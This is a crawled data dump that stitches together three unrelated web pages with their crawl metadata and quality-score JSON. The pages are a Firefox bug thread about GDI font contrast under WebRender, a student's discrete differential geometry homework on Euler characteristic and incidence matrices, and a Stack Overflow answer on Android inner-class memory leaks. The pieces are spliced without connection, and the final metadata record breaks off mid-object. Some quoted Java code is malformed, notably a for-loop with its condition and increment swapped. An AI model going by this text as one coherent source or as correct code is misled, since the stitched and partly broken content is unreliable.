I'm also experiencing it but it occurs on all text. The STR Virtual_ManPL listed is actually a less noticible way of reproducing than simply visiting any website (I'm using dark theme). It is much easier to notice it with black text on a white background.
I am using font scaling at 1.04x.
I'm also experiencing it but it occurs on all text. The STR Virtual_ManPL listed is actually a less noticible way of reproducing than simply visiting any website (I'm using dark theme). It is much easier to notice it with black text on a white background.
I am using font scaling at 1.04x.
The problem is enhanced contrast being applied in the GDI case. The gamma is actually now correct, it was just that the contrast artificially brightened dark text, but left light text unaffected, which is why we didn't notice this in the original bug.
Flags: needinfo?(lsalzman)
Pushed by [email protected]:
https://hg.mozilla.org/integration/autoland/rev/2cc215b4d3f6
Don't use enhanced contrast on GDI fonts. r=jfkthame
Assignee: nobody → lsalzman
Status: NEW → ASSIGNED
Priority: -- → P1
Status: ASSIGNED → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla70
Pushed by [email protected]:
https://hg.mozilla.org/integration/autoland/rev/90a13bb83261
force GDI parameters for GDI render mode. r=jrmuizel
I'm confirming that bug is fixed, starting in Mozilla Firefox Nightly 70.0a1 (2019-07-26), so I'm marking this bug as VERIFIED.
Thank you very much! \o/
Status: RESOLVED → VERIFIED
Font isn't 100% fixed for me, it seems like ClearType isn't working properly as text now looks thin and aliased. Not sure if it's due to this bug exactly though.
Could you please post screenshots before this bug and after patch with same content?
Flags: needinfo?(wot_up_dogg)
Hmm... I can't spot any difference now with the 20th build, haven't tried others but I have a feeling it may have been the latest 1903 Windows update.
Flags: needinfo?(wot_up_dogg)
Actually I can spot the differences but I can't immediately notice it anywhere but in the tab title. I'm not sure if the 20th build had correct font rendering but you can see the difference in font weight with these screenshots:
"[21]" is noticeably red and blue in comment 23, but it looks perfect in comment 24. By bug 1553818 some fonts were made thinner again to match pre-WebRender appearance.
Attached image before bug1568841.PNG
:darkspirit, I agree that the 27th build looks better when looking closely but I'm running a rather heavy ClearType: ClearType Parameters: Gamma: 2.2 Pixel Structure: RGB ClearType Level: 100 Enhanced Contrast: 100 which imo should be making the text have a little more weight to it.
The problem I'm facing is my eyesight has problems reading the now very thin text. I'm already using 1.04x scaling and going even .01 higher causes websites to have stupidly large text.
Attached image webrenderdisabled.PNG
This is with Webrender disabled, while for some reason it doesn't seem as clear in the screenshot (is sniping tool really lossless even though it's saving as png?) it is much clearer than current WR enabled. Most notably on the 0s.
Attachment #9080609 - Attachment description: bad.png → without patch from bug #1553818.png
Attachment #9080609 - Attachment filename: bad.png → without patch from bug #1553818.png
Attachment #9080610 - Attachment description: good.png → with patch from bug #1553818.png
Attachment #9080610 - Attachment filename: good.png → with patch from bug #1553818.png
Attachment #9081122 - Attachment filename: no issue.png → with patch from bug #1553818 & bug #1568841.png
Attachment #9081122 - Attachment is patch: false
In my case:
@ Jules A - Looks like you need to tune your non-default settings.
@ Lee Salzman [:lsalzman] - Thank you very much for fixing this issue, now with default settings text looks even better than before. Per bug #1553818 comment #13, I would like to request the request for uplifting also this bug to Firefox 69.
Flags: needinfo?(lsalzman)
Attachment #9080609 - Attachment description: without patch from bug #1553818.png → with patch from bug #1553818.png
Attachment #9080609 - Attachment filename: without patch from bug #1553818.png → with patch from bug #1553818.png
Attachment #9080610 - Attachment description: with patch from bug #1553818.png → without patch from bug #1553818.png
Attachment #9080610 - Attachment filename: with patch from bug #1553818.png → without patch from bug #1553818.png
@Virtual_ManPL I don't think you understand my issue though to be fair I think my main issue is actually moreso to do with bug #1553818 than this bug. Changing Cleartype will make every other app that uses it look like garbage so that's not an option (currently Edge has the best font rendering by default (since WR is by default enabled). Clearing font.size.systemFontScale means I would need to increase the whole app scaling which breaks themes and other UI elements while adding blurriness to the whole browser.
It's not that text isn't sharp now, it's just that it's too sharp that aliasing is a problem.
Why is it that WR disabled is able to respect these necessary changes of mine but it no longer does with WR enabled?
Oh and I'm using a 27" 1440p monitor, in-case you were wondering.
@ Jules A - Oh, I'm sorry, you're using mainly WebRender compositing. In my case I'm using Direct3D 11 (Advanced Layers) compositing, as I'm on Windows 7 and WebRender is disabled on it by default as I'm seeing in about:support, so no wonder I didn't understand you completely. I was thinking that it's mainly because of modified and changed default ClearType options either in system or browser. I could only recommend for you creating new bug about this and attach identical whole screenshots (like mine here) to easy spot differences between them. CC or needinfo me there, and I would help, if you will need it.
Comment on attachment 9080648 [details]
Bug 1568841 - Don't use enhanced contrast on GDI fonts. r?jfkthame
Beta/Release Uplift Approval Request
• User impact if declined: Windows users will see GDI fonts with incorrect contrast if using WebRender or Skia.
• Is this code covered by automated tests?: Yes
• Has the fix been verified in Nightly?: Yes
• Needs manual test from QE?: No
• If yes, steps to reproduce:
• List of other uplifts needed: None
• Risk to taking this patch: Low
• Why is the change risky/not risky? (and alternatives if risky):
• String changes made/needed:
Flags: needinfo?(lsalzman)
Attachment #9080648 - Flags: approval-mozilla-beta?
Attachment #9080960 - Flags: approval-mozilla-beta?
Comment on attachment 9080648 [details]
Bug 1568841 - Don't use enhanced contrast on GDI fonts. r?jfkthame
Follow-up fix for bug 1563818 to further improve Windows font rendering for users with WebRender enabled. Approved for 69.0b9.
Attachment #9080648 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Attachment #9080960 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
QA Whiteboard: [qa-triaged]
Thanks for verification Virtual_ManPL.
Flags: qe-verify+
You need to log in before you can comment on or make changes to this bug.
|
{
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1568841",
"source_domain": "bugzilla.mozilla.org",
"snapshot_id": "crawl=CC-MAIN-2021-04",
"warc_metadata": {
"Content-Length": "201791",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:O6AED5BRVKFW7LNZULJBP6GO54TT2C7G",
"WARC-Concurrent-To": "<urn:uuid:3df58160-dfa6-40eb-a474-10eb38a4bae7>",
"WARC-Date": "2021-01-19T16:49:32Z",
"WARC-IP-Address": "52.88.29.169",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:Q5LJXH67OGN4CHNKUSOSXMO2FFA5EGC6",
"WARC-Record-ID": "<urn:uuid:bcd7864c-25bf-4135-a985-d0656fc1bef3>",
"WARC-Target-URI": "https://bugzilla.mozilla.org/show_bug.cgi?id=1568841",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:e748c2fa-3a49-4af2-b41b-1a92ad04347f>"
},
"warc_info": "isPartOf: CC-MAIN-2021-04\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January 2021\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-23.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
57,
58,
118,
119,
130,
131,
168,
169,
179,
183,
191,
198,
199,
208,
209,
212,
213,
228,
238,
254,
283,
312,
337,
358,
379,
380,
387,
388,
428,
429,
440,
441,
454,
455,
463,
464,
477,
478,
490,
491,
502,
503,
524,
532,
553,
561,
582,
590,
611,
619,
656,
673,
710,
727,
747,
755,
775,
783,
803,
811,
831,
839,
860,
868,
869,
874,
875,
919,
951,
952,
1027,
1028,
1054,
1055,
1131,
1132,
1230,
1231,
1279,
1301,
1442,
1443,
1465,
1537,
1538,
1561,
1609,
1610,
1642,
1666,
1693,
1724,
1725,
1972,
1973,
2001,
2257,
2291,
2292,
2548,
2582,
2583,
2835,
2836,
2863,
2895,
2956,
3009,
3037,
3060,
3078,
3106,
3126,
3150,
3184,
3216,
3277,
3330,
3331,
3459,
3484,
3485,
3513,
3514,
3676,
3677,
3762,
3763,
3793,
3794,
3945,
3946,
3976,
3977,
4206,
4207,
4377,
4378,
4415,
4416,
4700,
4886,
4887,
4924,
4925,
5157,
5158,
5250,
5339,
5429,
5516,
5622,
5671,
5672,
5684,
5685,
5752,
5753,
5995,
5996,
6023,
6140,
6254,
6371,
6485,
6486,
7002,
7096,
7213,
7279,
7280,
7895,
7896,
7936,
8003,
8004,
8041,
8042,
8156,
8206,
8253,
8288,
8320,
8359,
8394,
8462,
8494,
8521,
8573,
8625,
8626,
8666,
8733,
8734,
8861,
8862,
8939,
9016,
9044,
9045,
9084,
9085,
9103
],
"line_end_idx": [
57,
58,
118,
119,
130,
131,
168,
169,
179,
183,
191,
198,
199,
208,
209,
212,
213,
228,
238,
254,
283,
312,
337,
358,
379,
380,
387,
388,
428,
429,
440,
441,
454,
455,
463,
464,
477,
478,
490,
491,
502,
503,
524,
532,
553,
561,
582,
590,
611,
619,
656,
673,
710,
727,
747,
755,
775,
783,
803,
811,
831,
839,
860,
868,
869,
874,
875,
919,
951,
952,
1027,
1028,
1054,
1055,
1131,
1132,
1230,
1231,
1279,
1301,
1442,
1443,
1465,
1537,
1538,
1561,
1609,
1610,
1642,
1666,
1693,
1724,
1725,
1972,
1973,
2001,
2257,
2291,
2292,
2548,
2582,
2583,
2835,
2836,
2863,
2895,
2956,
3009,
3037,
3060,
3078,
3106,
3126,
3150,
3184,
3216,
3277,
3330,
3331,
3459,
3484,
3485,
3513,
3514,
3676,
3677,
3762,
3763,
3793,
3794,
3945,
3946,
3976,
3977,
4206,
4207,
4377,
4378,
4415,
4416,
4700,
4886,
4887,
4924,
4925,
5157,
5158,
5250,
5339,
5429,
5516,
5622,
5671,
5672,
5684,
5685,
5752,
5753,
5995,
5996,
6023,
6140,
6254,
6371,
6485,
6486,
7002,
7096,
7213,
7279,
7280,
7895,
7896,
7936,
8003,
8004,
8041,
8042,
8156,
8206,
8253,
8288,
8320,
8359,
8394,
8462,
8494,
8521,
8573,
8625,
8626,
8666,
8733,
8734,
8861,
8862,
8939,
9016,
9044,
9045,
9084,
9085,
9103,
9176
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 9176,
"ccnet_original_nlines": 203,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.28470468521118164,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.03937404975295067,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.2932862341403961,
"rps_doc_frac_unique_words": 0.3654266893863678,
"rps_doc_mean_word_length": 5.2377824783325195,
"rps_doc_num_sentences": 123,
"rps_doc_symbol_to_word_ratio": 0.017163049429655075,
"rps_doc_unigram_entropy": 5.6721954345703125,
"rps_doc_word_count": 1371,
"rps_doc_frac_chars_dupe_10grams": 0.12115304172039032,
"rps_doc_frac_chars_dupe_5grams": 0.22016431391239166,
"rps_doc_frac_chars_dupe_6grams": 0.1891101449728012,
"rps_doc_frac_chars_dupe_7grams": 0.1891101449728012,
"rps_doc_frac_chars_dupe_8grams": 0.1891101449728012,
"rps_doc_frac_chars_dupe_9grams": 0.1566634178161621,
"rps_doc_frac_chars_top_2gram": 0.018799610435962677,
"rps_doc_frac_chars_top_3gram": 0.025066150352358818,
"rps_doc_frac_chars_top_4gram": 0.03676367923617363,
"rps_doc_books_importance": -769.9395141601562,
"rps_doc_books_importance_length_correction": -769.9395141601562,
"rps_doc_openwebtext_importance": -477.1268005371094,
"rps_doc_openwebtext_importance_length_correction": -477.1268005371094,
"rps_doc_wikipedia_importance": -358.37017822265625,
"rps_doc_wikipedia_importance_length_correction": -358.37017822265625
},
"fasttext": {
"dclm": 0.06993550062179565,
"english": 0.8756712079048157,
"fineweb_edu_approx": 1.322314977645874,
"eai_general_math": 0.3056735396385193,
"eai_open_web_math": 0.47399336099624634,
"eai_web_code": 0.14736831188201904
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.4",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "621.392",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Mechanical engineering and Machinery"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "4",
"label": "Code/Software"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "4",
"label": "Missing Images or Figures"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "18",
"label": "Q&A Forum"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "4",
"label": "Advanced Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-1,887,000,184,440,564,500
|
Discrete Differential Geometry Assignment 0
DDG Week2 Writing Assignment
2.1
Show that VE+F=1V - E + F = 1 for any polygonal disk.
For a simple n-sided polygon with n vertices, n edges, and 1 face, the equation above holds. When conncting another n-sided polygon to form a disk, the polygon can connect to the existing disk by merging mm edges. This will generate nmn-m edges, n(m+1)n-(m+1) vertices, and 1 new face.
V=V+nm+1E=E+nmF=F+1VE+F=VE+F+(n(m+1))(nm)+1=VE+F=1V' = V + n - m + 1 \\ E' = E + n - m \\ F' = F + 1 \\ V' - E' + F' = V - E + F + (n-(m+1)) - (n-m) + 1 = V - E + F = 1
The last equality stems from our inductive assumption.
2.2
In a platonic solid, there are FF m, n-gons meeting at VV vertices.
(F/m)(nF/2)+F=2(F/m) - (nF/2) + F = 2
2.8
Cl(S)
St(S)
Lk(S)
2.9
2.10
2.11
A0 = [
[1,1,0,0,0],
[1,0,1,0,0],
[1,0,0,1,0],
[1,0,0,0,1],
[0,1,0,0,1],
[0,1,1,0,0],
[0,0,1,1,0],
[0,0,0,1,1]
]
A1 = [
[1,0,0,1,1,0,0,0],
[1,1,0,0,0,1,0,0],
[0,1,1,0,0,0,1,0],
[0,0,1,1,0,0,0,1]
]
Coding
Code is somewhere, I haven't decided where to put it. The screenshots below should verify that the c++ code is working to solve the exercises.
All tests green: 11 tests passed
Star star
Link Link
Closure closure
|
{
"url": "https://sp4ghet.com/blog/ddg_wr0",
"source_domain": "sp4ghet.com",
"snapshot_id": "crawl=CC-MAIN-2021-25",
"warc_metadata": {
"Content-Length": "60247",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:DLKCSZLX3MIUTFZP35JUNGLJDMD7FZP4",
"WARC-Concurrent-To": "<urn:uuid:8d0f5026-f6d1-4b8a-a006-235d972c70e3>",
"WARC-Date": "2021-06-15T22:41:40Z",
"WARC-IP-Address": "76.76.21.21",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:PHLL2DAOC6BTIVIZS4IBKU5B4UNKKTUL",
"WARC-Record-ID": "<urn:uuid:89caa81b-8337-4b59-8164-014381a6c307>",
"WARC-Target-URI": "https://sp4ghet.com/blog/ddg_wr0",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:64816455-e4f5-4d96-8145-6465b9260ba3>"
},
"warc_info": "isPartOf: CC-MAIN-2021-25\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for June 2021\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-40.ec2.internal\r\nsoftware: Apache Nutch 1.18 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
44,
45,
46,
75,
76,
80,
81,
135,
136,
422,
423,
592,
593,
648,
649,
653,
654,
722,
723,
761,
762,
766,
767,
773,
774,
780,
781,
787,
788,
792,
793,
798,
799,
804,
805,
812,
827,
842,
857,
872,
887,
902,
917,
931,
933,
940,
961,
982,
1003,
1023,
1025,
1026,
1033,
1034,
1177,
1178,
1211,
1212,
1222,
1223,
1233,
1234
],
"line_end_idx": [
44,
45,
46,
75,
76,
80,
81,
135,
136,
422,
423,
592,
593,
648,
649,
653,
654,
722,
723,
761,
762,
766,
767,
773,
774,
780,
781,
787,
788,
792,
793,
798,
799,
804,
805,
812,
827,
842,
857,
872,
887,
902,
917,
931,
933,
940,
961,
982,
1003,
1023,
1025,
1026,
1033,
1034,
1177,
1178,
1211,
1212,
1222,
1223,
1233,
1234,
1249
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1249,
"ccnet_original_nlines": 62,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.1270161271095276,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.08870968222618103,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.6229838728904724,
"rps_doc_frac_unique_words": 0.6871508359909058,
"rps_doc_mean_word_length": 4.229050159454346,
"rps_doc_num_sentences": 15,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.602688789367676,
"rps_doc_word_count": 179,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.010568030178546906,
"rps_doc_frac_chars_top_3gram": 0.011889039538800716,
"rps_doc_frac_chars_top_4gram": 0.010568030178546906,
"rps_doc_books_importance": -243.29302978515625,
"rps_doc_books_importance_length_correction": -243.29302978515625,
"rps_doc_openwebtext_importance": -171.60174560546875,
"rps_doc_openwebtext_importance_length_correction": -171.6017303466797,
"rps_doc_wikipedia_importance": -185.06719970703125,
"rps_doc_wikipedia_importance_length_correction": -185.06719970703125
},
"fasttext": {
"dclm": 0.9488384127616882,
"english": 0.8388717174530029,
"fineweb_edu_approx": 2.7044637203216553,
"eai_general_math": 0.9803949594497681,
"eai_open_web_math": 0.7667142748832703,
"eai_web_code": 0.917669415473938
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "516.36",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Mathematics",
"level_3": "Geometry, Algebraic"
}
},
"secondary": {
"code": "516.3",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Mathematics",
"level_3": "Geometry, Algebraic"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "23",
"label": "Tutorial"
}
},
"reasoning_depth": {
"primary": {
"code": "4",
"label": "Advanced Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
6,754,369,423,923,856,000
|
298
I have been reading some articles on memory leaks in Android and watched this interesting video from Google I/O on the subject.
Still, I don't fully understand the concept, and especially when it is safe or dangerous to user inner classes inside an Activity.
This is what I understood:
A memory leak will occur if an instance of an inner class survives longer than its outer class (an Activity). -> In which situations can this happen?
In this example, I suppose there is no risk of leak, because there is no way the anonymous class extending OnClickListener will live longer than the activity, right?
final Dialog dialog = new Dialog(this);
dialog.setContentView(R.layout.dialog_generic);
Button okButton = (Button) dialog.findViewById(R.id.dialog_button_ok);
TextView titleTv = (TextView) dialog.findViewById(R.id.dialog_generic_title);
// *** Handle button click
okButton.setOnClickListener(new OnClickListener() {
public void onClick(View v) {
dialog.dismiss();
}
});
titleTv.setText("dialog title");
dialog.show();
Now, is this example dangerous, and why?
// We are still inside an Activity
_handlerToDelayDroidMove = new Handler();
_handlerToDelayDroidMove.postDelayed(_droidPlayRunnable, 10000);
private Runnable _droidPlayRunnable = new Runnable() {
public void run() {
_someFieldOfTheActivity.performLongCalculation();
}
};
I have a doubt regarding the fact that understanding this topic has to do with understanding in detail what is kept when an activity is destroyed and re-created.
Is it?
Let say I just changed the orientation of the device (which is the most common cause of leaks). When super.onCreate(savedInstanceState) will be called in my onCreate(), will this restore the values of the fields (as they were before orientation change)? Will this also restore the states of inner classes?
I realize my question is not very precise, but I'd really appreciate any explanation that could make things clearer.
612
What you are asking is a pretty tough question. While you may think it is just one question, you are actually asking several questions at once. I'll do my best with the knowledge that I have to cover it and, hopefully, some others will join in to cover what I may miss.
Nested Classes: Introduction
As I'm not sure how comfortable you are with OOP in Java, this will hit a couple of basics. A nested class is when a class definition is contained within another class. There are basically two types: Static Nested Classes and Inner Classes. The real difference between these are:
• Static Nested Classes:
• Are considered "top-level".
• Do not require an instance of the containing class to be constructed.
• May not reference the containing class members without an explicit reference.
• Have their own lifetime.
• Inner Nested Classes:
• Always require an instance of the containing class to be constructed.
• Automatically have an implicit reference to the containing instance.
• May access the container's class members without the reference.
• Lifetime is supposed to be no longer than that of the container.
Garbage Collection and Inner Classes
Garbage Collection is automatic but tries to remove objects based on whether it thinks they are being used. The Garbage Collector is pretty smart, but not flawless. It can only determine if something is being used by whether or not there is an active reference to the object.
The real issue here is when a inner class has been kept alive longer than its container. This is because of the implicit reference to the containing class. The only way this can occur is if an object outside of the containing class keeps a reference to the inner object, without regard to the containing object.
This can lead to a situation where the inner object is alive (via reference) but the references to the containing object has already been removed from all other objects. The inner object is, therefore, keeping the containing object alive because it will always have a reference to it. The problem with this is that unless it is programmed, there is no way to get back to the containing object to check if it is even alive.
The most important aspect to this realization is that it makes no difference whether it is in an Activity or is a drawable. You will always have to be methodical when using inner classes and make sure that they never outlive objects of the container. Luckily, if it isn't a core object of your code, the leaks may be small in comparison. Unfortunately, these are some of the hardest leaks to find, because they are likely to go unnoticed until many of them have leaked.
Solutions: Inner Classes
• Gain temporary references from the containing object.
• Allow the containing object to be the only one to keep long-lived references to the inner objects.
• Use established patterns such as the Factory.
• If the inner class does not require access to the containing class members, consider turning it into a static class.
• Use with caution, regardless of whether it is in an Activity or not.
Activities and Views: Introduction
Activities contain a lot of information to be able to run and display. Activities are defined by the characteristic that they must have a View. They also have certain automatic handlers. Whether you specify it or not, the Activity has an implicit reference to the View it contains.
In order for a View to be created, it must know where to create it and whether it has any children so that it can display. This means that every View has an reference to the Activity (via getContext()). Moreover, every View keeps references to its children (i.e. getChildAt()). Finally, each View keeps a reference to the rendered Bitmap that represents its display.
Whenever you have a reference to an Activity (or Activity Context), this means that you can follow the ENTIRE chain down the layout hierarchy. This is why memory leaks regarding Activities or Views are such a huge deal. It can be a ton of memory being leaked all at once.
Activities, Views and Inner Classes
Given the information above about Inner Classes, these are the most common memory leaks, but also the most commonly avoided. While it is desirable to have an inner class have direct access to an Activities class members, many are willing to just make them static to avoid potential issues. The problem with Activities and Views goes much deeper than that.
Leaked Activities, Views and Activity Contexts
It all comes down to the Context and the LifeCycle. There are certain events (such as orientation) that will kill an Activity Context. Since so many classes and methods require a Context, developers will sometimes try to save some code by grabbing a reference to a Context and holding onto it. It just so happens that many of the objects we have to create to run our Activity have to exist outside of the Activity LifeCycle in order to allow the Activity to do what it needs to do. If any of your objects happen to have a reference to an Activity, its Context, or any of its Views when it is destroyed, you have just leaked that Activity and its entire View tree.
Solutions: Activities and Views
• Avoid, at all costs, making a Static reference to a View or Activity.
• All references to Activity Contexts should be short lived (the duration of the function)
• If you need a long-lived Context, use the Application Context (getBaseContext() or getApplicationContext()). These do not keep references implicitly.
• Alternatively, you may limit the destruction of an Activity by overriding Configuration Changes. However, this does not stop other potential events from destroying the Activity. While you can do this, you may still want to refer to the above practices.
Runnables: Introduction
Runnables are actually not that bad. I mean, they could be, but really we've already hit most of the danger zones. A Runnable is an asynchronous operation that performs a task independant from the thread it was created on. Most runnables are instantiated from the UI thread. In essence, using a Runnable is creating another thread, just slightly more managed. If you class a Runnable like a standard class and follow the guidelines above, you should run into few problem. The reality is that many developers do not do this.
Out of ease, readability and logical program flow, many developers utilize Anonymous Inner Classes to define their Runnables, such as the example you create above. This results in an example like the one you typed above. An Anonymous Inner Class is basically a discrete Inner Class. You just don't have to create a whole new definition and simply override the appropriate methods. In all other respects it is a Inner Class, which means that it keeps an implicit reference to its container.
Runnables and Activities/Views
Yay! This section can be short! Due to the fact that Runnables run outside of the current thread, the danger with these comes to long running asynchronous operations. If the runnable is defined in an Activity or View as an Anonymous Inner Class OR nested Inner Class, there are some very serious dangers. This is because, as previously stated, it has to know who its container is. Enter the orientation change (or system kill). Now just refer back to the previous sections to understand what just happened. Yes, your example is quite dangerous.
Solutions: Runnables
• Try and extend Runnable, if it doesn't break the logic of your code.
• Do your best to make extended Runnables static, if they must be nested classes.
• If you must use Anonymous Runnables, avoid creating them in any object that has a long-lived reference to an Activity or View that is in use.
• Many Runnables could just as easily have been AsyncTasks. Consider using AsyncTask as those are VM Managed by default.
Answering the Final Question Now to answer the questions that were not directly addressed by the other sections of this post. You asked "When can an object of an inner class survive longer than its outer class?" Before we get to this, let me reemphasize: though you are right to worry about this in Activities, it can cause a leak anywhere. I shall provide a simple example (without using an Activity) just to demonstrate.
Below is a common example of a basic factory (missing the code).
public class LeakFactory
{//Just so that we have some data to leak
int myID = 0;
// Necessary because our Leak class is an Inner class
public Leak createLeak()
{
return new Leak();
}
// Mass Manufactured Leak class
public class Leak
{//Again for a little data.
int size = 1;
}
}
This is a not as common example, but simple enough to demonstrate. The key here is the constructor...
public class SwissCheese
{//Can't have swiss cheese without some holes
public Leak[] myHoles;
public SwissCheese()
{//Gotta have a Factory to make my holes
LeakFactory _holeDriller = new LeakFactory()
// Now, let's get the holes and store them.
myHoles = new Leak[1000];
for (int i = 0; i++; i<1000)
{//Store them in the class member
myHoles[i] = _holeDriller.createLeak();
}
// Yay! We're done!
// Buh-bye LeakFactory. I don't need you anymore...
}
}
Now, we have Leaks, but no Factory. Even though we released the Factory, it will remain in memory because every single Leak has a reference to it. It doesn't even matter that the outer class has no data. This happens far more often than one might think. We don't need the creator, just its creations. So we create one temporarily, but use the creations indefinitely.
Imagine what happens when we change the constructor just slightly.
public class SwissCheese
{//Can't have swiss cheese without some holes
public Leak[] myHoles;
public SwissCheese()
{//Now, let's get the holes and store them.
myHoles = new Leak[1000];
for (int i = 0; i++; i<1000)
{//WOW! I don't even have to create a Factory...
// This is SOOOO much prettier....
myHoles[i] = new LeakFactory().createLeak();
}
}
}
Now, every single one of those new LeakFactories has just been leaked. What do you think of that? Those are two very common examples of how a inner class can outlive an outer class of any type. If that outer class had been an Activity, imagine how much worse it would have been.
Conclusion
These list the primarily known dangers of using these objects inappropriately. In general, this post should have covered most of your questions, but I understand it was a loooong post, so if you need clarification, just let me know. As long as you follow the above practices, you will have very little worry of leakage.
• 3
Thanks a lot for this clear and detailed answer. I just don't get what you mean by "many developers utilize closures to define their Runnables" – Sébastien Jun 10 '12 at 19:37
• 1
Closures in Java are Anonymous Inner Classes, like the Runnable you describe. Its a way to utilize a class (almost extend it) without writing a defined Class that extends Runnable. It's called a closure because it is "a closed class definition" in that it has its own closed memory space within the actual containing object. – Fuzzical Logic Jun 10 '12 at 20:00
• 22
Enlightening write-up! One remark regarding terminology: There is no such thing as a static inner class in Java. (Docs). A nested class is either static or inner, but cannot be both at the same time. – jenzz Jun 16 '13 at 19:53
• 2
While that is technically correct, Java allows you to define static classes inside static classes. The terminology is not for my benefit, but for the benefit of others who do not understand the technical semantics. This is why it is first mentioned that they are "top-level". The Android developer docs also use this terminology, and this is for people looking at Android development, so I thought it better to keep consistency. – Fuzzical Logic Jun 20 '13 at 7:39
• 12
Great post, one of the best at StackOverflow, esp for Android. – StackOverflowed Jul 21 '13 at 23:49
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
{
"url": "https://stackoverflow.com/questions/10864853/when-exactly-is-it-leak-safe-to-use-anonymous-inner-classes",
"source_domain": "stackoverflow.com",
"snapshot_id": "crawl=CC-MAIN-2019-22",
"warc_metadata": {
"Content-Length": "141097",
